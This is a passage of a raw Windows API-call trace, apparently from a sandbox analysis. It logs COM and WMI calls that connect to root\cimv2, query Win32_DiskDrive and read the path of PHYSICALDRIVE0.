riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0277.644] WbemDefPath:IUnknown:Release (This=0x5a8ed8) returned 0x2 [0277.644] WbemDefPath:IUnknown:Release (This=0x5a8ed8) returned 0x1 [0277.645] CoGetContextToken (in: pToken=0x43e2f4 | out: pToken=0x43e2f4) returned 0x0 [0277.645] CoGetContextToken (in: pToken=0x43e254 | out: pToken=0x43e254) returned 0x0 [0277.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a8ed8, riid=0x43e324*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e320 | out: ppvObject=0x43e320*=0x5a8ed8) returned 0x0 [0277.645] WbemDefPath:IUnknown:AddRef (This=0x5a8ed8) returned 0x3 [0277.645] WbemDefPath:IUnknown:Release (This=0x5a8ed8) returned 0x2 [0277.646] WbemDefPath:IWbemPath:SetText (This=0x5a8ed8, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0277.647] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eb9c | out: puCount=0x43eb9c*=0x2) returned 0x0 [0277.648] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eb98*=0x0, pszText=0x0 | out: puBuffLength=0x43eb98*=0xf, pszText=0x0) returned 0x0 [0277.648] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eb98*=0xf, pszText="00000000000000" | out: puBuffLength=0x43eb98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0277.670] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43eb24 | out: ppv=0x43eb24*=0x500344) returned 0x0 [0277.670] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43eb1c | out: pAptType=0x43eb1c*=1) returned 0x0 [0277.670] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43eb20 | out: ppvObject=0x43eb20*=0x0) returned 0x80004002 [0277.670] IUnknown:Release (This=0x500344) returned 0x0 [0277.670] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x43ea24 | out: lpiid=0x43ea24) returned 0x0 [0277.671] CoGetClassObject (in: rclsid=0x5aa334*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e740 | out: ppv=0x43e740*=0x56e3190) returned 0x0 [0277.679] WbemLocator:IUnknown:QueryInterface (in: This=0x56e3190, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e958 | out: ppvObject=0x43e958*=0x0) returned 0x80004002 [0277.679] WbemLocator:IClassFactory:CreateInstance (in: This=0x56e3190, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e964 | out: ppvObject=0x43e964*=0x596d48) returned 0x0 [0277.679] WbemLocator:IUnknown:Release (This=0x56e3190) returned 0x0 [0277.679] WbemLocator:IUnknown:QueryInterface (in: This=0x596d48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e584 | out: ppvObject=0x43e584*=0x596d48) returned 0x0 [0277.679] WbemLocator:IUnknown:QueryInterface (in: This=0x596d48, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e538 | out: ppvObject=0x43e538*=0x0) returned 0x80004002 [0277.679] WbemLocator:IUnknown:AddRef (This=0x596d48) returned 0x3 [0277.679] WbemLocator:IUnknown:QueryInterface (in: This=0x596d48, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43de94 | out: ppvObject=0x43de94*=0x0) returned 0x80004002 [0277.679] WbemLocator:IUnknown:QueryInterface (in: This=0x596d48, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43de44 | out: ppvObject=0x43de44*=0x0) returned 0x80004002 [0277.679] WbemLocator:IUnknown:QueryInterface (in: This=0x596d48, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de50 | out: ppvObject=0x43de50*=0x0) returned 0x80004002 [0277.679] CoGetContextToken (in: pToken=0x43deb0 | out: pToken=0x43deb0) returned 0x0 [0277.680] CoGetObjectContext (in: riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x56e3194 | out: ppv=0x56e3194*=0x500338) returned 0x0 [0277.681] CoGetContextToken (in: pToken=0x43e2c4 | out: pToken=0x43e2c4) returned 0x0 [0277.681] WbemLocator:IUnknown:QueryInterface (in: This=0x596d48, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e344 | out: ppvObject=0x43e344*=0x0) returned 0x80004002 [0277.681] WbemLocator:IUnknown:Release (This=0x596d48) returned 0x2 [0277.681] WbemLocator:IUnknown:Release (This=0x596d48) returned 0x1 [0277.681] CoGetContextToken (in: pToken=0x43e944 | out: pToken=0x43e944) returned 0x0 [0277.681] CoGetContextToken (in: pToken=0x43e8a4 | out: pToken=0x43e8a4) returned 0x0 [0277.681] WbemLocator:IUnknown:QueryInterface (in: This=0x596d48, riid=0x43e974*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e970 | out: ppvObject=0x43e970*=0x596d48) returned 0x0 [0277.681] WbemLocator:IUnknown:AddRef (This=0x596d48) returned 0x3 [0277.681] WbemLocator:IUnknown:Release (This=0x596d48) returned 0x2 [0277.683] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eb00 | out: puCount=0x43eb00*=0x2) returned 0x0 [0277.683] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=8, puBuffLength=0x43eafc*=0x0, pszText=0x0 | out: puBuffLength=0x43eafc*=0xf, pszText=0x0) returned 0x0 [0277.683] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=8, puBuffLength=0x43eafc*=0xf, pszText="00000000000000" | out: puBuffLength=0x43eafc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0277.683] CoCreateInstance (in: rclsid=0x6c313734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6c313794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x43e9ac | out: ppv=0x43e9ac*=0x596d58) returned 0x0 [0277.683] WbemLocator:IWbemLocator:ConnectServer (in: This=0x596d58, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x43ea4c | out: ppNamespace=0x43ea4c*=0x5ad7b0) returned 0x0 [0277.842] WbemLocator:IUnknown:QueryInterface (in: This=0x5ad7b0, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e8d0 | out: ppvObject=0x43e8d0*=0x58dc9c) returned 0x0 [0277.843] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x58dc9c, pProxy=0x5ad7b0, pAuthnSvc=0x43e920, pAuthzSvc=0x43e91c, pServerPrincName=0x43e914, pAuthnLevel=0x43e918, pImpLevel=0x43e908, pAuthInfo=0x43e90c, pCapabilites=0x43e910 | out: pAuthnSvc=0x43e920*=0xa, pAuthzSvc=0x43e91c*=0x0, pServerPrincName=0x43e914, pAuthnLevel=0x43e918*=0x6, pImpLevel=0x43e908*=0x2, pAuthInfo=0x43e90c, pCapabilites=0x43e910*=0x1) returned 0x0 [0277.843] WbemLocator:IUnknown:Release (This=0x58dc9c) returned 0x1 [0277.843] WbemLocator:IUnknown:QueryInterface (in: This=0x5ad7b0, riid=0x6c3135a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e8c4 | out: ppvObject=0x43e8c4*=0x58dcbc) returned 0x0 [0277.843] WbemLocator:IUnknown:QueryInterface (in: This=0x5ad7b0, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e8b0 | out: ppvObject=0x43e8b0*=0x58dc9c) returned 0x0 [0277.843] WbemLocator:IClientSecurity:SetBlanket (This=0x58dc9c, pProxy=0x5ad7b0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0277.843] WbemLocator:IUnknown:Release (This=0x58dc9c) returned 0x2 [0277.843] WbemLocator:IUnknown:Release (This=0x58dcbc) returned 0x1 [0277.843] CoTaskMemFree (pv=0x56ecb88) [0277.843] WbemLocator:IUnknown:AddRef (This=0x5ad7b0) returned 0x2 [0277.844] WbemLocator:IUnknown:Release (This=0x596d58) returned 0x0 [0277.844] CoGetContextToken (in: pToken=0x43de04 | out: pToken=0x43de04) returned 0x0 [0277.844] CoGetContextToken (in: pToken=0x43e214 | out: pToken=0x43e214) returned 0x0 [0277.844] WbemLocator:IUnknown:QueryInterface (in: This=0x5ad7b0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e1b0 | out: ppvObject=0x43e1b0*=0x58dca4) returned 0x0 [0277.845] WbemLocator:IRpcOptions:Query (in: This=0x58dca4, pPrx=0x56e3460, dwProperty=2, pdwValue=0x43e2a4 | out: pdwValue=0x43e2a4) returned 0x80004002 [0277.845] WbemLocator:IUnknown:Release (This=0x58dca4) returned 0x2 [0277.845] CoGetContextToken (in: pToken=0x43e7e4 | out: pToken=0x43e7e4) returned 0x0 [0277.845] CoGetContextToken (in: pToken=0x43e744 | out: pToken=0x43e744) returned 0x0 [0277.845] WbemLocator:IUnknown:QueryInterface (in: This=0x5ad7b0, riid=0x43e814*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x43e6e0 | out: ppvObject=0x43e6e0*=0x5ad7b0) returned 0x0 [0277.845] WbemLocator:IUnknown:Release (This=0x5ad7b0) returned 0x2 [0277.852] SysStringLen (param_1=0x0) returned 0x0 [0277.852] CoGetContextToken (in: pToken=0x43e904 | out: pToken=0x43e904) returned 0x0 [0277.852] IWbemServices:ExecQuery (in: This=0x5ad7b0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_DiskDrive", lFlags=16, pCtx=0x0, ppEnum=0x43eb0c | out: ppEnum=0x43eb0c*=0x511530) returned 0x0 [0277.861] IUnknown:QueryInterface (in: This=0x511530, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e968 | out: ppvObject=0x43e968*=0x511534) returned 0x0 [0277.861] IClientSecurity:QueryBlanket (in: This=0x511534, pProxy=0x511530, pAuthnSvc=0x43e9b8, pAuthzSvc=0x43e9b4, pServerPrincName=0x43e9ac, pAuthnLevel=0x43e9b0, pImpLevel=0x43e9a0, pAuthInfo=0x43e9a4, pCapabilites=0x43e9a8 | out: pAuthnSvc=0x43e9b8*=0xa, pAuthzSvc=0x43e9b4*=0x0, pServerPrincName=0x43e9ac, pAuthnLevel=0x43e9b0*=0x6, pImpLevel=0x43e9a0*=0x2, pAuthInfo=0x43e9a4, pCapabilites=0x43e9a8*=0x1) returned 0x0 [0277.861] IUnknown:Release (This=0x511534) returned 0x1 [0277.861] IUnknown:QueryInterface (in: This=0x511530, riid=0x6c3135a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e95c | out: ppvObject=0x43e95c*=0x58dadc) returned 0x0 [0277.861] IUnknown:QueryInterface (in: This=0x511530, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e948 | out: ppvObject=0x43e948*=0x511534) returned 0x0 [0277.861] IClientSecurity:SetBlanket (This=0x511534, pProxy=0x511530, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0277.865] IUnknown:Release (This=0x511534) returned 0x2 [0277.865] WbemLocator:IUnknown:Release (This=0x58dadc) returned 0x1 [0277.865] CoTaskMemFree (pv=0x56ecc18) [0277.865] IUnknown:AddRef (This=0x511530) returned 0x2 [0277.866] CoGetContextToken (in: pToken=0x43de88 | out: pToken=0x43de88) returned 0x0 [0277.866] CoGetContextToken (in: pToken=0x43e29c | out: pToken=0x43e29c) returned 0x0 [0277.866] IUnknown:QueryInterface (in: This=0x511530, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e234 | out: ppvObject=0x43e234*=0x58dac4) returned 0x0 [0277.866] WbemLocator:IRpcOptions:Query (in: This=0x58dac4, pPrx=0x56e3478, dwProperty=2, pdwValue=0x43e328 | out: pdwValue=0x43e328) returned 0x80004002 [0277.866] WbemLocator:IUnknown:Release (This=0x58dac4) returned 0x2 [0277.866] CoGetContextToken (in: pToken=0x43e86c | out: pToken=0x43e86c) returned 0x0 [0277.866] CoGetContextToken (in: pToken=0x43e7cc | out: pToken=0x43e7cc) returned 0x0 [0277.866] IUnknown:QueryInterface (in: This=0x511530, riid=0x43e89c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x43e768 | out: ppvObject=0x43e768*=0x511530) returned 0x0 [0277.867] IUnknown:Release (This=0x511530) returned 0x2 [0277.867] SysStringLen (param_1=0x0) returned 0x0 [0277.867] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eb58 | out: puCount=0x43eb58*=0x2) returned 0x0 [0277.867] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eb54*=0x0, pszText=0x0 | out: puBuffLength=0x43eb54*=0xf, pszText=0x0) returned 0x0 [0277.867] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eb54*=0xf, pszText="00000000000000" | out: puBuffLength=0x43eb54*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0277.867] CoGetContextToken (in: pToken=0x43e9ac | out: pToken=0x43e9ac) returned 0x0 [0277.867] IEnumWbemClassObject:Clone (in: This=0x511530, ppEnum=0x43eb64 | out: ppEnum=0x43eb64*=0x5115f8) returned 0x0 [0277.869] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43ea20 | out: ppvObject=0x43ea20*=0x5115fc) returned 0x0 [0277.869] IClientSecurity:QueryBlanket (in: This=0x5115fc, pProxy=0x5115f8, pAuthnSvc=0x43ea70, pAuthzSvc=0x43ea6c, pServerPrincName=0x43ea64, pAuthnLevel=0x43ea68, pImpLevel=0x43ea58, pAuthInfo=0x43ea5c, pCapabilites=0x43ea60 | out: pAuthnSvc=0x43ea70*=0xa, pAuthzSvc=0x43ea6c*=0x0, pServerPrincName=0x43ea64, pAuthnLevel=0x43ea68*=0x6, pImpLevel=0x43ea58*=0x2, pAuthInfo=0x43ea5c, pCapabilites=0x43ea60*=0x1) returned 0x0 [0277.869] IUnknown:Release (This=0x5115fc) returned 0x1 [0277.869] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x6c3135a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43ea14 | out: ppvObject=0x43ea14*=0x58de9c) returned 0x0 [0277.869] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43ea00 | out: ppvObject=0x43ea00*=0x5115fc) returned 0x0 [0277.869] IClientSecurity:SetBlanket (This=0x5115fc, pProxy=0x5115f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0277.872] IUnknown:Release (This=0x5115fc) returned 0x2 [0277.872] WbemLocator:IUnknown:Release (This=0x58de9c) returned 0x1 [0277.872] CoTaskMemFree (pv=0x56ecc48) [0277.872] IUnknown:AddRef (This=0x5115f8) returned 0x2 [0277.873] CoGetContextToken (in: pToken=0x43df30 | out: pToken=0x43df30) returned 0x0 [0277.873] CoGetContextToken (in: pToken=0x43e344 | out: pToken=0x43e344) returned 0x0 [0277.873] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e2dc | out: ppvObject=0x43e2dc*=0x58de84) returned 0x0 [0277.873] WbemLocator:IRpcOptions:Query (in: This=0x58de84, pPrx=0x56e34d8, dwProperty=2, pdwValue=0x43e3d0 | out: pdwValue=0x43e3d0) returned 0x80004002 [0277.873] WbemLocator:IUnknown:Release (This=0x58de84) returned 0x2 [0277.873] CoGetContextToken (in: pToken=0x43e914 | out: pToken=0x43e914) returned 0x0 [0277.873] CoGetContextToken (in: pToken=0x43e874 | out: pToken=0x43e874) returned 0x0 [0277.874] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x43e944*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x43e810 | out: ppvObject=0x43e810*=0x5115f8) returned 0x0 [0277.874] IUnknown:Release (This=0x5115f8) returned 0x2 [0277.874] SysStringLen (param_1=0x0) returned 0x0 [0277.875] IEnumWbemClassObject:Reset (This=0x5115f8) returned 0x0 [0277.877] CoTaskMemAlloc (cb=0x4) returned 0x56e9ed0 [0277.878] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56e9ed0, puReturned=0x2781964 | out: apObjects=0x56e9ed0*=0x5947a8, puReturned=0x2781964*=0x1) returned 0x0 [0277.933] IUnknown:QueryInterface (in: This=0x5947a8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e1bc | out: ppvObject=0x43e1bc*=0x5947a8) returned 0x0 [0277.933] IUnknown:QueryInterface (in: This=0x5947a8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e170 | out: ppvObject=0x43e170*=0x0) returned 0x80004002 [0277.933] IUnknown:QueryInterface (in: This=0x5947a8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43df98 | out: ppvObject=0x43df98*=0x0) returned 0x80004002 [0277.934] IUnknown:AddRef (This=0x5947a8) returned 0x3 [0277.934] IUnknown:QueryInterface (in: This=0x5947a8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43dacc | out: ppvObject=0x43dacc*=0x0) returned 0x80004002 [0277.934] IUnknown:QueryInterface (in: This=0x5947a8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43da7c | out: ppvObject=0x43da7c*=0x0) returned 0x80004002 [0277.934] IUnknown:QueryInterface (in: This=0x5947a8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43da88 | out: ppvObject=0x43da88*=0x5947ac) returned 0x0 [0277.934] IMarshal:GetUnmarshalClass (in: This=0x5947ac, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43da90 | out: pCid=0x43da90*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0277.934] IUnknown:Release (This=0x5947ac) returned 0x3 [0277.934] CoGetContextToken (in: pToken=0x43dae8 | out: pToken=0x43dae8) returned 0x0 [0277.934] CoGetContextToken (in: pToken=0x43defc | out: pToken=0x43defc) returned 0x0 [0277.934] IUnknown:QueryInterface (in: This=0x5947a8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43df7c | out: ppvObject=0x43df7c*=0x0) returned 0x80004002 [0277.934] IUnknown:Release (This=0x5947a8) returned 0x2 [0277.934] CoGetContextToken (in: pToken=0x43e4e4 | out: pToken=0x43e4e4) returned 0x0 [0277.934] CoGetContextToken (in: pToken=0x43e444 | out: pToken=0x43e444) returned 0x0 [0277.934] IUnknown:QueryInterface (in: This=0x5947a8, riid=0x43e514*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e510 | out: ppvObject=0x43e510*=0x5947a8) returned 0x0 [0277.935] IUnknown:AddRef (This=0x5947a8) returned 0x4 [0277.935] IUnknown:Release (This=0x5947a8) returned 0x3 [0277.935] IUnknown:Release (This=0x5947a8) returned 0x2 [0277.935] CoTaskMemFree (pv=0x56e9ed0) [0277.935] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0277.935] IUnknown:AddRef (This=0x5947a8) returned 0x3 [0277.938] IWbemClassObject:Get (in: This=0x5947a8, wszName="__GENUS", lFlags=0, pVal=0x43eb54*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43ebd4*=0, plFlavor=0x43ebd0*=0 | out: pVal=0x43eb54*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43ebd4*=3, plFlavor=0x43ebd0*=64) returned 0x0 [0277.939] IWbemClassObject:Get (in: This=0x5947a8, wszName="__PATH", lFlags=0, pVal=0x43eb38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43ebbc*=0, plFlavor=0x43ebb8*=0 | out: pVal=0x43eb38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"", varVal2=0x0), pType=0x43ebbc*=8, plFlavor=0x43ebb8*=64) returned 0x0 [0277.941] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x90 [0277.941] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x90 [0277.941] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43eb64 | out: ppv=0x43eb64*=0x500344) returned 0x0 [0277.941] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43eb5c | out: pAptType=0x43eb5c*=1) returned 0x0 [0277.941] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43eb60 | out: ppvObject=0x43eb60*=0x0) returned 0x80004002 [0277.941] 